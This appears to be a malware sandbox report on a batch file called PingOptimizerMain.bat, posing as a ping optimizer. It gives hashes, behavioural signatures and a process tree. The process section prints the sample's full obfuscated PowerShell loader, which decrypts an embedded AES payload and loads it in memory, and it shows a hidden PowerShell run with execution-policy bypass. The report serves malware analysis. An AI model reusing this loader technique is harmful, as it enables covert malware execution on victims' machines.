Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
57s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
09/01/2024, 11:03
Static task
static1
Behavioral task
behavioral1
Sample
PingOptimizerMain.bat
Resource
win7-20231215-en
5 signatures
150 seconds
General
-
Target
PingOptimizerMain.bat
-
Size
11.7MB
-
MD5
ffc97bdf56ecbee34e263c88f330a9fd
-
SHA1
7f83beb8534cdc3f3ee2147e74d6f698812f2859
-
SHA256
d63b1658179ccc4b45c7f9726b83e32763850a046480b76a8f8920c709309b3e
-
SHA512
09a9dbf6d13297a89ea4d1dbe56ae8f4485ecb832b8fe4cf302d805aa1077ed496e1e84024014ad2238b937fd09c21067112bf52aec373deaf4c20df51ae85c1
-
SSDEEP
49152:zA8wtTTWxiw/n2WZfp8Nuw3PdwARNLfKu5LTEgwJt/eYr8ZLYY3GU80pJzgN5Vsi:X
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 2464 powershell.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2960 taskmgr.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe -
Suspicious use of SendNotifyMessage 58 IoCs
pid Process 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe 2960 taskmgr.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2632 wrote to memory of 2516 2632 cmd.exe 29 PID 2632 wrote to memory of 2516 2632 cmd.exe 29 PID 2632 wrote to memory of 2516 2632 cmd.exe 29 PID 2632 wrote to memory of 2464 2632 cmd.exe 30 PID 2632 wrote to memory of 2464 2632 cmd.exe 30 PID 2632 wrote to memory of 2464 2632 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "2⤵PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2960